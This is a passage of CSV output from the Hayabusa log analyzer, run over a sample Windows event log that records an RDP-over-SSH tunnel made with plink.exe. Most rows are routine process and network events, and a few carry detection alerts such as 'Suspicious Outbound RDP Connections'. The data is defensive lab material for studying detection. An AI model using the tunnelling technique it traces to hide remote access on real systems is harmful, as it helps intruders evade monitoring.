+09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: 
SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off 
MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 
+09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle 
Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 
19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: 
SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 
365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network 
Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 
(PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 